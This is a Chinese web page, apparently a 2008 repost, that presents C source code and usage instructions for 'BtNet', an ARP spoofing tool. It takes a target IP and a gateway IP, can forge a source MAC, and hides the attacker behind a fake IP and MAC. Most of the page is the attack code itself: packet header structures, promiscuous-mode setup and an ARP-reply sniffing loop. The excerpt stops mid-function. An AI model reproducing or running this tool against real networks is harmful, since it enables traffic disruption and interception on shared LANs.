基于ARP欺骗的网络攻击程序源码

　2008-11-21 13:34:20　来源：WEB开发网　　　

核心提示： 再说一下，以上测试只对于windows系统，基于ARP欺骗的网络攻击程序源码(2)，当然也测试过对没有配置好的Red Hat成功过，测试程序(BtNet.exe)说明：Usage: BtNet -h attackIP -o gateIP [-m spoofedMAC]-m参数是你要修改的源

再说一下，以上测试只对于windows系统，当然也测试过对没有配置好的Red Hat成功过。

测试程序(BtNet.exe)说明：

Usage: BtNet -h attackIP -o gateIP [-m spoofedMAC]

-m参数是你要修改的源MAC地址.

为了隐蔽攻击者身份，程序再得到目标主机MAC地址时伪装成IP:128.128.128.128,MAC:a5-a5-a5-a5-a5-a5，可能会得不到目标主机的MAC地址，那么要得到MAC地址请借助第三方工具。

附测试程序代码

#include "packet32.h" #include "ntddndis.h" #include #include #include #include #pragma comment(lib,"ws2_32") #pragma comment(lib,"packet") #define ETH_IP 0x0800 #define ETH_ARP 0x0806 #define ARP_REQUEST 0x0001 //arp请求包 #define ARP_REPLY 0x0002 //arp应答包 #define ARP_HARDWARE 0x0001 #define max_num_adapter 10 #pragma pack(push,1) typedef struct ethdr { unsigned char eh_dst[6]; //以太网目的地址 unsigned char eh_src[6]; //以太网源地址 unsigned short eh_type; // }ETHDR,*PETHDR; typedef struct arphdr //arp头 { unsigned short arp_hdr; //硬件类型 unsigned short arp_pro; //协议类型 unsigned char arp_hln; //硬件地址长度 unsigned char arp_pln; //协议地址长度 unsigned short arp_opt; // unsigned char arp_sha[6]; //发送端以太网地址 unsigned long arp_spa; //发送端ip地址 unsigned char arp_tha[6]; //接收端以太网地址 unsigned long arp_tpa; //接收端ip地址 }ARPHDR,*PARPHDR; typedef struct ip_mac { u_long ip; unsigned char mac[6]; }IP_MAC,*PIP_MAC; #pragma pack(push) LPADAPTER lpAdapter; char adapterlist[max_num_adapter][1024]; IP_MAC toipandmac; IP_MAC oipandmac,myipandmac; BOOL param6=FALSE; char *noMACstr; char noMAC[6][3]; u_long mytoIP,oIP; BOOL sendtoOip; MSG msg; UINT newtimer; char MYIP[20]="128.128.128.128"; BOOL toipandmac_flag=FALSE,myipandmac_flag=FALSE,oipandmac_flag=FALSE; int getint(char c) { int t=-1; if((c<='9')&&(c>='0')) t=c-'0'; else if((c>='a')&&(c<='f')) t=10+c-'a'; else if((c>='A')&&(c<='F')) t=10+c-'A'; return t; } void start() { printf("BtNet //--an ARP Tool test the Windows Break the Internetn"); printf("written by Ruder,10/2003n"); printf("Homepage: http://xEyes.cdut.net/ruder/index.htm;n"); printf("E-mail: cocoruder@163.comn"); printf("nUsage: BtNet -h attackIP -o gateIP [-m spoofedMAC]n"); printf("Example:n"); printf("BtNet -h 202.115.138.12 -o 202.115.138.1n"); printf("BtNet -h 202.115.138.12 -o 202.115.138.1 -m 00-50-fc-6a--6b--7cn"); printf(" Warning: You must have installed the winpcap_2.3 or winpcap_3.0_alphan"); return ; } DWORD WINAPI sniff(LPVOID) { LPPACKET lppackets,lpPacketr; char recvbuf[1024*250]; ULONG ulbytesreceived,off; ETHDR *eth; ARPHDR *arp; char *buf,*pChar,*base; char szTemp[20]; struct bpf_hdr *hdr; if((lppackets=PacketAllocatePacket())==FALSE) { printf("PacketAllocatePacket send Error: %dn",GetLastError()); return 0; } if(PacketSetHwFilter(lpAdapter,NDIS_PACKET_TYPE_PROMISCUOUS)==FALSE) { printf("Warning: Unable to set the adapter to promiscuous moden"); } if(PacketSetBuff(lpAdapter,500*1024)==FALSE) { printf("PacketSetBuff Error: %dn",GetLastError()); return 0; } if(PacketSetReadTimeout(lpAdapter,1)==FALSE) { printf("Warning: Unable to set the timeoutn"); } if((lpPacketr=PacketAllocatePacket())==FALSE) { printf("PacketAllocatePacket receive Error: %dn",GetLastError()); return 0; } PacketInitPacket(lpPacketr,(char *)recvbuf,sizeof(recvbuf)); while(!kbhit()) { if(PacketReceivePacket(lpAdapter,lpPacketr,TRUE)==FALSE) { return 0; } //getdata(lppacketr,option); ulbytesreceived=lpPacketr->ulBytesReceived; buf=(char *)lpPacketr->Buffer; off=0; while(off{ if(kbhit()) { return 0; } hdr=(struct bpf_hdr *)(buf+off); off+=hdr->bh_hdrlen; pChar=(char *)(buf+off); base=pChar; off=Packet_WORDALIGN(off+hdr->bh_caplen); eth=(PETHDR)pChar; //以太头 arp=(PARPHDR)(pChar+sizeof(ETHDR)); //arp头 int i; if((eth->eh_type==htons(ETH_ARP))&& (arp->arp_opt==htons(ARP_REPLY))) { //if (arp->arp_tpa==htonl(ntohl(inet_addr(MYIP)))) { if(oipandmac_flag&&myipandmac_flag&&toipandmac_flag) return 0; if (((toipandmac.ip==htonl(arp->arp_spa))&&(toipandmac_flag==FALSE)) ||((myipandmac.ip==htonl(arp->arp_spa))&&(myipandmac_flag==FALSE)) ||((oipandmac.ip==htonl(arp->arp_spa))&&(oipandmac_flag==FALSE))) { memset(szTemp,0,sizeof(szTemp)); memcpy(szTemp,&arp->arp_spa,sizeof(arp->arp_spa)); printf("[IP]:"); printf("%s",inet_ntoa(*((struct in_addr *)szTemp))); pr